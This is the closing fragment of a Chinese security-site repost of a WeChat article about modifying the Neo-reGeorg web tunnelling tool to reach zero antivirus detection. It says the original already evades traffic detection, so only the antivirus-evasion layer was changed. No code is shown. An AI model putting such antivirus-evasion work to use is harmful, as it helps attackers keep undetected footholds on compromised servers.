至于工具本身的流量检测规避,在原版中已经做了的,所以这里只改免杀层面上

~

原文始发于微信公众号(PwnPigPig):免杀Neo-reGeorg隧道工具-0查杀率修改完成

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月22日12:50:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   免杀Neo-reGeorg隧道工具-0查杀率修改完成https://cn-sec.com/archives/2514664.html

发表评论

匿名网友 填写信息